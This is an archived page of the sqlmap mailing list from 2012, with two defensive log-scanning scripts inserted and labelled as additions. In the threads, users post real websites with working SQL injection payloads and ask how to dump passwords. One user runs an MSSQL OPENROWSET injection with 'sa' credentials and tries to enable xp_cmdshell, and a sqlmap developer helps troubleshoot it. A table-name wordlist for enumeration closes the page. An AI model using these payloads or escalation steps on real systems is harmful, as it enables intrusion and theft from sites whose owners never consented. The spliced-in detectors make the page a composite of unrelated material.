sqlmap-users Mailing List for sqlmap (Page 57)
From: Miroslav S. <mir...@gm...> - 2012-06-25 15:40:33

Hi Bob.

James and Iago are right. Please don't use the mailing list to post real target URLs.

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

From: Iago S. <146...@gm...> - 2012-06-25 12:20:07

Yes,
In some places the usage of pentest without mutual consent is illegal. (Or is it the opposite?)

I advise you to read the legal disclaimer in sqlmap's banner. And take it as a recommendation. Don't keep posting URL vulns in the mailing list, only the traffic file if it is required by Miroslav (in private conversation) (to correct a bug or something like that).

--
Regards,
Iago Sousa

From: James <ja...@ev...> - 2012-06-25 11:57:15

Are you serious?

DON'T POST VULNERABLE URLS ON THE MAILING LIST.

This mailing list needs to move to something more censored if people are going to be so stupid.

From: B. <sto...@qq...> - 2012-06-25 08:02:19
|
http://www.alcosens.com/fsbClient/ezboard.jsp injectable parameter is: "searchWord" www.mobcstyle.com/goods/search.php", using HTTP method GET. The injectable parameter is: "search_price_start "http://www.keyway.com.tw/pro_overview.php?_sn=2%27%20AND%208126=8126%20AND%20%27Cqlm%27=%27Cqlm" is there anyone can use sqlmap find injected point? best regards Bob |
From: B. <sto...@qq...> - 2012-06-25 07:43:56
|
http://www.alcosens.com/fsbClient/ezboard.jsp injectable parameter is: "searchWord" www.mobcstyle.com/goods/search.php", using HTTP method GET. The injectable parameter is: "search_price_start is there anyone can use sqlmap find injected point? best regards Bob |
From: James <ja...@ev...> - 2012-06-24 05:03:38

I've had sites with poorly configured SQL servers time out. It happens.

You should probably try increasing the time out first of all.

James

From: Iago S. <146...@gm...> - 2012-06-24 04:34:05

I think that the site is blocking your ip address.

From: B. <sto...@qq...> - 2012-06-24 02:09:08

Hi all,

I am using sqlmap to retrieve the database.
current-user and current-db work.
Retrieving tables, passwords etc. gets a response timeout.

Could you tell me what the problem is? How can I retrieve tables and passwords?

Thanks
bob

    [09:56:07] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: c_sn
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl
    ---

    [09:56:08] [INFO] testing MySQL
    [09:56:08] [INFO] confirming MySQL
    [09:56:08] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux CentOS 5
    web application technology: Apache 2.2.3, PHP 5.1.6
    back-end DBMS: MySQL >= 5.0.0
    [09:56:08] [INFO] fetching current user
    [09:56:08] [INFO] resumed: keyway_db@localhost
    current user: 'keyway_db@localhost'

    [09:56:08] [INFO] fetching database users privileges
    [09:56:08] [INFO] fetching database users
    [09:56:08] [INFO] fetching number of database users
    [09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:56:08] [INFO] retrieved:
    [09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
    [09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
    [09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
    [10:00:12] [CRITICAL] connection timed out to the target url or proxy

    [*] shutting down at 10:00:12

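The two payloads in the sqlmap output above, seen from the server side: this is an added example, not part of the original post and not sqlmap code. It URL-decodes query parameters in access-log lines and flags the tautology and delay patterns; it goes slightly beyond the MySQL `SLEEP()` case by also matching the delay primitives of other DBMSs. The log lines, paths, client addresses and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# AND/OR followed by <n>=<n>, e.g. "AND 8126=8126".
NUM_TAUTOLOGY = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)
# AND/OR followed by 'x'='x; the closing quote is usually left for the
# application's own query to supply, so it is not required here.
STR_TAUTOLOGY = re.compile(r"\b(?:AND|OR)\s+'(\w+)'\s*=\s*'\1(?!\w)", re.I)
# Delay primitives used by time-based blind tests (MySQL, PostgreSQL, MSSQL).
TIME_DELAY = re.compile(
    r"\b(?:SLEEP\s*\(\s*\d+|BENCHMARK\s*\(|PG_SLEEP\s*\(|WAITFOR\s+DELAY\b)",
    re.I,
)


def classify_value(value):
    """Return sorted labels for the patterns found in one decoded value."""
    hits = set()
    if NUM_TAUTOLOGY.search(value) or STR_TAUTOLOGY.search(value):
        hits.add("tautology")
    if TIME_DELAY.search(value):
        hits.add("time-delay")
    return sorted(hits)


def scan_log(lines):
    """Yield-style scan: list of (line_no, client, parameter, labels)."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        client = line.split(" ", 1)[0]
        query = urlsplit(match.group("target")).query
        # parse_qsl percent-decodes names and values for us.
        for name, value in parse_qsl(query, keep_blank_values=True):
            labels = classify_value(value)
            if labels:
                findings.append((line_no, client, name, labels))
    return findings


def flagged_clients(findings, min_hits=2):
    """Clients with at least min_hits flagged requests (a scan, not a typo)."""
    counts = Counter(client for _, client, _, _ in findings)
    return sorted(c for c, n in counts.items() if n >= min_hits)


# Constructed sample log: one normal request, the two payload shapes from
# the sqlmap output, and two benign requests that must not be flagged.
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jun/2012:09:55:58 +0000] '
    '"GET /item.php?c_sn=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jun/2012:09:56:01 +0000] '
    '"GET /item.php?c_sn=2%27%20AND%208126%3D8126%20AND%20%27Cqlm%27%3D%27Cqlm'
    ' HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jun/2012:09:56:03 +0000] '
    '"GET /item.php?c_sn=2%27%20AND%20SLEEP%285%29%20AND%20%27eKVl%27%3D%27eKVl'
    ' HTTP/1.1" 200 5120',
    '203.0.113.20 - - [23/Jun/2012:09:56:10 +0000] '
    '"GET /search.php?q=salt+and+pepper&page=1 HTTP/1.1" 200 812',
    '203.0.113.20 - - [23/Jun/2012:09:56:12 +0000] '
    '"GET /search.php?q=1%3D1+explained HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for line_no, client, name, labels in results:
        print(f"line {line_no}: {client} parameter={name} {labels}")
    print("clients to review:", flagged_clients(results))
```

Pattern matching of this kind only surfaces candidates for review; the fix for the injection itself is parameterised queries in the application.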
From: Pedrito P. <0ar...@gm...> - 2012-06-21 16:49:22

    [11:46:09] [INFO] testing connection to the target url
    [11:46:13] [WARNING] unknown web page charset 'iso-5589-1'. Please report by e-mail to sql...@li....

From: Miroslav S. <mir...@gm...> - 2012-06-21 12:19:21

Hi Adi.

I think that that is really the proper way to "escape" the single quote in MsSQL (http://stackoverflow.com/questions/1586560/how-do-i-escape-a-single-quote-in-sqlserver) and you can't use any CHAR() escaping directly inside the OPENROWSET (there are some ways to do it via EXEC http://social.msdn.microsoft.com/forums/en-US/transactsql/thread/0f78e033-53a4-4404-a190-9e3b269874ec <- you can use CHAR() escaping there, but I really do believe that this is unnecessary in your case).

So, I would suggest that you continue playing around a bit (e.g. with other extended stored procedures (http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm) to see if the problem persists).

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

From: Adi M. <adi...@ya...> - 2012-06-21 11:12:17

-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5',' select @@version; master..sp_configure ''xp_cmdshell'',1 ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808

the problem is with the query:

select @@version; master..sp_configure ''xp_cmdshell'',1

Any possibility to give the string from ascii codes as in mysql?

From: Miroslav S. <mir...@gm...> - 2012-06-21 11:01:39

It all depends on context. You'll need to send a sample that you want to run. Quotes are not interpreted/parsed everywhere the same.

Kind regards

--
Miroslav Stampar
http://about.me/stamparm

From: Adi M. <adi...@ya...> - 2012-06-21 10:57:36
My feeling is that "[OLE/DB provider returned message: Deferred prepare could not be completed." is because of an SQL error :) so my fault.

And regarding the second error, I think you must always return some columns in the query, such as select @@version.

Now the question is how do I embed a string inside another string delimited with quotes? Looks like double quotes are not working... doubling the quote '' looks like it is not always working...

From: Adi M. <adi...@ya...> - 2012-06-21 08:45:37
tried, same stuff.
I've tried to reenable xp_cmdshell first with

master..sp_configure 'show advanced options',1
reconfigure
master..sp_configure 'xp_cmdshell',1
reconfigure

and got the same error: [OLE/DB provider returned message: Deferred prepare could not be completed.]

then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
and got error:

OLE DB error trace [Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '].

From: Miroslav S. <mir...@gm...> - 2012-06-21 08:26:28
Try with master..resultabcd

I forgot to mention that there need to be two dots (or the schema name in between) between the db name and the table name in MSSQL.

--
Miroslav Stampar
http://about.me/stamparm

From: Adi M. <adi...@ya...> - 2012-06-21 08:24:33
Hi Miroslav,

got db_name master and tried with master.resultabcd but I get the same error.

Kind Regards,
A.

From: Miroslav S. <mir...@gm...> - 2012-06-21 08:14:17
p.s. find the current database name and prepend to the resultbcd (e.g. ........'SELECT output FROM currentdb.resultbcd'........)

p.p.s. SELECT DB_NAME() <- should work for retrieving current db name via that OPENROWSET

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-06-21 08:11:49
Hi Adi.

You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466)

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

From: Adi M. <adi...@ya...> - 2012-06-21 08:03:19
I'm having an injection like this:
openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)

-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808

and when I try to select from resultabcd I get:
[OLE/DB provider returned message: Deferred prepare could not be completed.]

Could not find a good answer with Google. Thanks.

Kind regards,
A.

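Seen from the defending side, the statements in the thread above (OPENROWSET with an inline `uid=`/`pwd=` connection string, `sp_configure` turning on `xp_cmdshell`, `sp_addextendedproc`) are all things a web access log can be searched for. The detector below is an added example, not part of the original messages and not sqlmap code; the log format, the `/teachers.asp` path, the client addresses and the rule names are assumptions, and the sample log lines are constructed from the statements quoted in the thread.

```python
import re
from urllib.parse import quote, unquote, unquote_plus

# A statement nested inside another string literal arrives with its quotes
# doubled, so every quote position accepts one or more ' or " characters.
Q = "['\"]+"

# Rule names are made up for this example.
RULES = {
    "openrowset_adhoc": re.compile(r"\bopen(?:rowset|datasource)\s*\(", re.I),
    "openrowset_inline_credentials": re.compile(
        r"\bopenrowset\s*\(\s*'[^']*'\s*,\s*'[^']*\b(?:uid|user id)\s*=[^']*"
        r"\b(?:pwd|password)\s*=", re.I),
    "sp_configure_advanced_options": re.compile(
        r"\bsp_configure\s+" + Q + r"show advanced options" + Q + r"\s*,\s*1\b", re.I),
    "sp_configure_xp_cmdshell": re.compile(
        r"\bsp_configure\s+" + Q + r"xp_cmdshell" + Q + r"\s*,\s*1\b", re.I),
    "sp_addextendedproc": re.compile(r"\bsp_addextendedproc\b", re.I),
}

# Common/Combined Log Format request line (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalise(raw, max_rounds=3):
    """URL-decode (also double-encoded input), drop /* */ comments, squeeze spaces."""
    text = unquote_plus(raw)
    for _ in range(max_rounds - 1):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip()


def redact(statement):
    """Keep credentials found in a request out of the alert itself."""
    return re.sub(r"(?i)\b(pwd|password)\s*=\s*[^;'\s]*", r"\1=<redacted>", statement)


def scan_access_log(lines):
    """Return one finding per log line whose query string matches any rule."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        statement = normalise(match.group("target").partition("?")[2])
        hits = sorted(name for name, rx in RULES.items() if rx.search(statement))
        if hits:
            findings.append({"line": number, "client": match.group("ip"),
                             "rules": hits, "statement": redact(statement)})
    return findings


def _log_line(ip, value, rounds=1):
    """Build a constructed log line; rounds=2 simulates double URL-encoding."""
    for _ in range(rounds):
        value = quote(value, safe="")
    return (f'{ip} - - [21/Jun/2012:10:01:12 +0000] '
            f'"GET /teachers.asp?id={value} HTTP/1.1" 200 512')


# Constructed sample input (hypothetical application path, documentation IPs).
SAMPLE_LOG = [
    _log_line("203.0.113.9", "808"),
    _log_line("198.51.100.7",
              "-1 union all select '1',(select * from OPENROWSET('SQLOLEDB',"
              "'uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5',"
              "'select output from resultbcd')) from teachers7 where id=808"),
    _log_line("198.51.100.7",
              "808;exec master..sp_configure 'show advanced options',1;reconfigure;"
              "exec master..sp_configure 'xp_cmdshell',1;reconfigure", rounds=2),
    _log_line("198.51.100.7",
              '808;exec sp_addextendedproc "xp_cmdshell","xp_log70.dll"'),
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["line"], finding["client"], finding["rules"])
        print("   ", finding["statement"])
```
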
From: Pedrito P. <0ar...@gm...> - 2012-06-21 03:32:41
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:27:50

[16:27:50] [INFO] using 'C:\Users\Admin\Desktop\sqlmap\output\ www.dtvthai.com\session' as session file
[16:27:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:27:50] [INFO] testing connection to the target url
[16:27:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Id=3) AND 4216=4216 AND (6256=6256

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: Id=3) AND (SELECT 2258 FROM(SELECT COUNT(*),CONCAT(0x3a656c643a,(SELECT (CASE WHEN (2258=2258) THEN 1 ELSE 0 END)),0x3a6a6a643a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3553=3553

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: Id=3) LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a656c643a,0x5877664a584155517a56,0x3a6a6a643a), NULL, NULL, NULL#
---
[16:27:54] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD or Linux FreeBSD 7.3
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[16:27:54] [INFO] fetching database names
[16:27:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: C:\Users\Admin\Desktop\sqlmap\sqlmap.py -u ******************************* --dbs
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)

[*] shutting down at 16:27:54

From: Pedrito P. <0ar...@gm...> - 2012-06-21 03:14:29
# Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
# See the file 'doc/COPYING' for copying permission
# List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
# List from hyrax (http://sla.ckers.org/forum/read.php?16,36047)
# List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py)
# List provided by Anastasios Monachos (ana...@gm...)
# Various Joomla tables
# site:br # site:cn # site:de # site:es # site:fr # site:it # site:jp # site:ru
field field_options file file_storage filearchive files files_config films fiscal fk_test_has_fk fk_test_has_pk flow foreigntest foreigntest2 form_data form_data_archive form_definition form_definition_text form_definition_version form_definition_version_text form_error forum forum.ibf_members forum_cat forum_flag forum_post forum_report forum_topic forum_user forum_user_activity forum_user_stat forum_users forum_vote forums foto fournisseur fournisseurType fragment framework_email friend friend2 friend_statuses friends fruit func functions funny_jokes furniture fusion_user_groups fusion_users games ganatlebe_ge gd gearing general general_log genres genres_in_movies geo_Desert geo_Estuary geo_Island geo_Lake geo_Mountain geo_River geo_Sea geo_Source geraet gestionnaire gestor gesuche gifi gl glas glmm globals gly grandchild_test grants graphs graphs_items grau_escolaridade grau_parentesco greylist groupe groupes groups grp grupo grupoatividade gruppi guanggaotp guanli guanliyuan guava_group_assignments guava_groups guava_packages guava_preferences guava_role_assignments guava_roles guava_roleviews guava_sysmodules guava_theme_modules guava_themes guava_users guava_views guestbook guiaavulsa guiaavulsa_itemguiaavulsa gws_admin gws_banner gws_category gws_client gws_jobs gws_news gws_page gws_product gws_purchase gws_text h_admin habilidad hardware hash hashes hauptsächlich help_category help_keyword help_relation help_topic hero hersteller herunterladen hibernate_unique_key hilfe history_str hitcounter hoeren honorsinfo host hostbenchmarks hosts hot_prop hourlyEmployees house_extensions hsa_user humanitaruli_ge ibf_admin_sessions ibf_conf_settings ibf_members ibf_members_converge ibf_sessions icq id identification identities idioma idiomaxegresado ike_configs image imageAttribute imageCategoryList imageInfo imagelinks imagem imagens images index indexation indice individual info ingredients inscription insertids instituicao insurance intGroups intUseringroup 
intUsers interactions internetaddress interwiki intranet_users inv_lines_seq investigator invite invoice invoices invoices_seq ipassocs ipb.ibf_members ipb_sessions ipblocks iplinks ipmacassocs ippaths ips isDeleted_table isMember islandIn item_master_seq itemguiaavulsa itemnotafiscal items items_template itens iuridiuli_ge jforum_attach jforum_categories jforum_config jforum_extension_groups jforum_extensions jforum_forums jforum_groups jforum_posts jforum_privmsgs jforum_quota_limit jforum_ranks jforum_roles jforum_smilies jforum_topics jforum_users jforum_vote_desc jhu jiveExtComponentConf jiveGroup jiveGroupProp jiveGroupUser jiveID jiveOffline jivePrivacyList jivePrivate jiveProperty jiveRemoteServerConf jiveRoster jiveRosterGroups jiveSASLAuthorized jiveUser jiveUserProp jiveVCard jiveVersion job job_history job_title jobs joomla_users jos_banner jos_bannerclient jos_bannertrack jos_blastchatc_users jos_categories jos_components jos_comprofiler_members jos_contact_details jos_content jos_content_frontpage jos_content_rating jos_core_acl_aro jos_core_acl_aro_groups jos_core_acl_aro_map jos_core_acl_aro_sections jos_core_acl_groups_aro_map jos_core_log_items jos_core_log_searches jos_docman jos_docman_groups jos_docman_licenses jos_estadisticas jos_groups jos_jce_groups jos_jce_plugins jos_jf_content jos_jf_tableinfo jos_joomblog_users jos_languages jos_menu jos_menu_types jos_messages jos_messages_cfg jos_migration_backlinks jos_modules jos_modules_menu jos_moschat_users jos_newsfeeds jos_plugins jos_poll_data jos_poll_date jos_poll_menu jos_polls jos_preguntas jos_respuestas jos_sections jos_session jos_stats_agents jos_templates_menu jos_user jos_users jos_vm_auth_group jos_vm_auth_user_group jos_vm_auth_user_vendor jos_vm_cart jos_vm_category jos_vm_category_xref jos_vm_country jos_vm_coupons jos_vm_creditcard jos_vm_csv jos_vm_currency jos_vm_export jos_vm_function jos_vm_manufacturer jos_vm_manufacturer_category jos_vm_module jos_vm_order_history 
jos_vm_order_item jos_vm_order_payment jos_vm_order_status jos_vm_order_user_info jos_vm_orders jos_vm_payment_method jos_vm_product jos_vm_product_attribute jos_vm_product_attribute_sku jos_vm_product_category_xref jos_vm_product_discount jos_vm_product_download jos_vm_product_files jos_vm_product_mf_xref jos_vm_product_price jos_vm_product_product_type_xref jos_vm_product_relations jos_vm_product_reviews jos_vm_product_type jos_vm_product_type_parameter jos_vm_product_votes jos_vm_shipping_carrier jos_vm_shipping_label jos_vm_shipping_rate jos_vm_shopper_group jos_vm_shopper_vendor_xref jos_vm_state jos_vm_tax_rate jos_vm_user_info jos_vm_userfield jos_vm_userfield_values jos_vm_vendor jos_vm_vendor_category jos_vm_waiting_list jos_vm_zone_shipping jos_weblinks journal jubjub_errors jurosstrategy karbar karbaran kategorien kauf kauf_artikel kbase_category kbase_main key keyboards keys keywords klassen knews_lostpass knjiga korisnici kpro_adminlogs kpro_user kreditkarte kultura_ge kurs kwdikos langlinks language_text last lc_fields leases legacy_things lending les noms d'utilisateur librarian licenses lieferant liens ligneDeCommande ligneDeFacture line_items_seq lineas_fac lines links list liste_domaines lists live_ge livre loan locale located locatedOn locations locus_data log log_fake_referers logging login_admin login_admins login_name login_user login_users loginout logon logout logradouro logs logtest lokal lookup lost_pass lost_passwords lostpass lostpasswords m_admin m_data m_earnings m_news m_plans m_type m_users m_users_acct m_users_profile m_with mac macassocs maclinks macswitches madewith mail mailaddresses mailbox main makemodel mambo_session mambo_users manage manager manufacturer manutencao map_event mapdata marital_status markers massenmail master_table math maxcodcorreo maxcodcurso maxcodestudio maxcodevento maxcodexperiencia maxcodtelefono mb_users meals media medicalprocedure medien meetings mehrwertsteuer mein_doc mein_doc_h melodies memberid 
memberlist members members_networks membership membre membres membros_familia menu mergesWith message message_statuses messages metadata mgbliuyan mima minibbtable_users mixins mlattach mlgroup mlmail mm mobile_menu mobile_menu_text modir modiriat moduleexecs modulemailling modulemessage modulephoto modulerubriquephoto modules monitoringi_ge monthlabel moradia most_recent_checksum motd_coding moves movie movies mpassword mtb_pref mtb_zip mucAffiliation mucConversationLog mucMember mucRoom mucRoomProp multastrategy multastrategy_faixamulta municipio musername mushroom_NBC mushroom_NBC_class mushroom_dataset mushroom_test_results mushroom_test_results_agg mushroom_testset mushroom_trainset music_association music_ge music_items mwuser my_county my_lake my_poi my_street mybb_users mymps_advertisement mymps_badwords mymps_cache mymps_certification mymps_channel mymps_checkanswer mymps_config mymps_corp mymps_crons mymps_lifebox mymps_mail_sendlist mymps_mail_template mymps_member_album mymps_member_category mymps_member_comment mymps_member_docu mymps_member_docutype mymps_member_tpl mymps_navurl mymps_news mymps_news_focus mymps_news_img mymps_payapi mymps_payrecord mymps_telephone mymps_upload mysql mysql.user names nc ncat ndb_binlog_index net_pm networking networks neuf new news_category news_lostpass newsletter newsletter_queue newsletter_recipients nguoidung nguoidungs nlconfig nodes nom nom d'utilisateur noms not_null_test not_null_with_default_test not_sent_mails notafiscal notafiscal_deducao notafiscal_itemnotafiscal notes noticias notizen nuke_authors nuke_autonews nuke_banner nuke_banner_plans nuke_banner_positions nuke_banner_terms nuke_bbauth_access nuke_bbbanlist nuke_bbcategories nuke_bbconfig nuke_bbdisallow nuke_bbforum_prune nuke_bbforums nuke_bbgroups nuke_bbposts nuke_bbposts_text nuke_bbprivmsgs nuke_bbprivmsgs_text nuke_bbranks nuke_bbsearch_results nuke_bbsearch_wordlist nuke_bbsearch_wordmatch nuke_bbsessions nuke_bbsmilies nuke_bbthemes 
nuke_bbthemes_name nuke_bbtopics nuke_bbtopics_watch nuke_bbuser_group nuke_bbvote_desc nuke_bbvote_results nuke_bbvote_voters nuke_bbwords nuke_blocks nuke_cities nuke_comments nuke_config nuke_confirm nuke_counter nuke_downloads_categories nuke_downloads_downloads nuke_downloads_editorials nuke_downloads_modrequest nuke_downloads_newdownload nuke_downloads_votedata nuke_encyclopedia nuke_encyclopedia_text nuke_faqanswer nuke_faqcategories nuke_gallery_categories nuke_gallery_comments nuke_gallery_media_class nuke_gallery_media_types nuke_gallery_pictures nuke_gallery_pictures_newpicture nuke_gallery_rate_check nuke_gallery_template_types nuke_groups nuke_groups_points nuke_headlines nuke_journal nuke_journal_comments nuke_journal_stats nuke_links_categories nuke_links_editorials nuke_links_links nuke_links_modrequest nuke_links_newlink nuke_links_votedata nuke_main nuke_message nuke_modules nuke_pages nuke_pages_categories nuke_poll_check nuke_poll_data nuke_poll_desc nuke_pollcomments nuke_popsettings nuke_public_messages nuke_queue nuke_referer nuke_related nuke_reviews nuke_reviews_add nuke_reviews_comments nuke_reviews_main nuke_session nuke_stats_date nuke_stats_hour nuke_stats_month nuke_stats_year nuke_stories nuke_stories_cat nuke_subscriptions nuke_topics nuke_users nuke_users_temp nuked_page nulltest numedia obb_profiles object object_link object_types objectcache oc occasion odetails oe offers officer oidtest oil_banner oil_bannerclient oil_bannertrack oil_bfsurvey_pro oil_bfsurvey_pro_categories oil_bfsurvey_pro_example oil_bfsurveypro_34 oil_bfsurveypro_35 oil_bfsurveypro_choices oil_biolmed_blocks oil_biolmed_entity oil_biolmed_entity_types oil_biolmed_land oil_biolmed_measurements oil_biolmed_measures oil_biolmed_measures_by_entity_types oil_biolmed_technician oil_biolmed_thesis oil_categories oil_components oil_contact_details oil_content oil_content_frontpage oil_content_rating oil_core_acl_aro oil_core_acl_aro_groups oil_core_acl_aro_map 
oil_core_acl_aro_sections oil_core_acl_groups_aro_map oil_core_log_items oil_core_log_searches oil_dbcache oil_google oil_google_destinations oil_groups oil_jf_content oil_jf_tableinfo oil_languages oil_menu oil_menu_types oil_messages oil_messages_cfg oil_migration_backlinks oil_modules oil_modules_menu oil_newsfeeds oil_phocadownload oil_phocadownload_categories oil_phocadownload_licenses oil_phocadownload_sections oil_phocadownload_settings oil_phocadownload_user_stat oil_phocagallery oil_phocagallery_categories oil_phocagallery_comments oil_phocagallery_img_votes oil_phocagallery_img_votes_statistics oil_phocagallery_user_category oil_phocagallery_votes oil_phocagallery_votes_statistics oil_plugins oil_poll_data oil_poll_date oil_poll_menu oil_polls oil_rokdownloads oil_rokversions oil_sections oil_session oil_stats_agents oil_templates_menu oil_users oil_weblinks oldimage operation options order order_item order_line order_source orders_recalculate ordre ordreReparation organization_seq organization_type_package_map organizations orgs os osc_categories osc_categories_description osc_manufacturers osc_manufacturers_info osc_products osc_products_attributes osc_products_attributes_download osc_products_description osc_products_images osc_products_options osc_products_options_values osc_products_options_values_to_products_options osc_products_to_categories osc_reviews osc_specials ostypes osvendors outdoor_spaces p0fs package page page_log_exclusion page_restrictions pagecontent pagelinks pages papel papers paramtres parent_test parol partenaire partenaires participate partner partners partof partscustomer partsgroup partstax partsvendor pass pass_hash passe passes passw passwd passwds password passwords patient pay pay_melodies payer payload payment payment_qenta payments pc peer_config_child_config peer_configs pelates people people_reg perdorues perdoruesit perfil personnel personnes handicapes persons pessoa pessoa_endereco pessoa_telefone pg_ts_cfg 
pg_ts_cfgmap pg_ts_dict phonelist phones phorum_session phorum_user phorum_users photo photoo photos phpBB2.forum_users phpBB2.phpbb_users php_users phpads_clients phpads_config phpbb_acl_options phpbb_auth_access phpbb_banlist phpbb_categories phpbb_config phpbb_confirm phpbb_disallow phpbb_forum_prune phpbb_forums phpbb_groups phpbb_points_config phpbb_points_values phpbb_posts phpbb_posts_text phpbb_privmsgs phpbb_privmsgs_text phpbb_ranks phpbb_search_results phpbb_search_wordlist phpbb_search_wordmatch phpbb_sessions phpbb_smilies phpbb_themes phpbb_themes_name phpbb_topics phpbb_topics_watch phpbb_user_group phpbb_users phpbb_vote_desc phpbb_vote_results phpbb_vote_voters phpbb_words phpcms_announce phpmyadmin.pma_table_info phpshop_baners phpshop_categories phpshop_links phpshop_menu phpshop_news phpshop_opros phpshop_opros_categories phpshop_system phpshop_users physician pictures pierre liste placex platforms plugin plugin_sid plurielanim pma_bookmark pma_column_info pma_designer_coords pma_history pma_pdf_pages pma_relation pma_table_coords pma_table_info pma_tracking po_seq pokes poll poll_user pools portal_access portale post posts power powers preferences prereq presence pricegroup primarytest primarytest2 principal priorities problem proc procedure_biosample procedure_data_set processo procs_priv product_category product_colour_multi product_font product_font_multi product_price product_related product_size_multi product_type production_multiple production_wtype products_images produit produits produtos profession1 profile_pictures profiles profiling program project_user_xref projects projeto promocoes protocol protocol_action provincias pruefen psw pswd publicationauthor publicationfile publicusers publishers pueblos punbb_users pw pw_actions pw_adminset pw_announce pw_attachs pw_banuser pw_bbsinfo pw_config pw_credits pw_favors pw_forums pw_hack pw_membercredit pw_memberinfo pw_members pw_msg pw_polls pw_posts pw_schcache pw_sharelinks pw_smiles 
pw_styles pw_threads pw_tmsgs pw_usergroups pw_wordfb pwd pwd1 pwds pword pwrd quanly quantri queries querycache querycache_info querycachetwo questions queue_info radacct rating_track rcpt readers realtable rec_jobs recentchanges reciprocal_admin reciprocal_config reciprocal_links reciprocal_mails reciprocal_partnersites records redirect ref reg reg_user reg_users regioni register registeration registered registriert reglement reguser regusers rel_paper_topic rel_person_organization rel_person_paper rel_person_topic relation_members relations report reports request reservation reserve resource_types resources result resumo reviews revision riddles rights roads_endpoints rol role_permission roles rooms root roots roster routerbenchmarks routers routing rss rss_categories rss_category rss_item rss_read rss_subscription ruletest ruolo sailors sala salariedEmployees salesorder samedicino_ge sampleData sazog_urtiertoba_ge sazog_urtiertoba_ge2 sb_host_admin sb_host_adminActiveDataFeed sb_host_adminAffichage1 sb_host_adminAffichage1name sbreciprocal_cats schedule schema_info school sconfig searchindex section sections sector seen seentype seite_abschnitt seite_layout self_government_ge sendmsgs 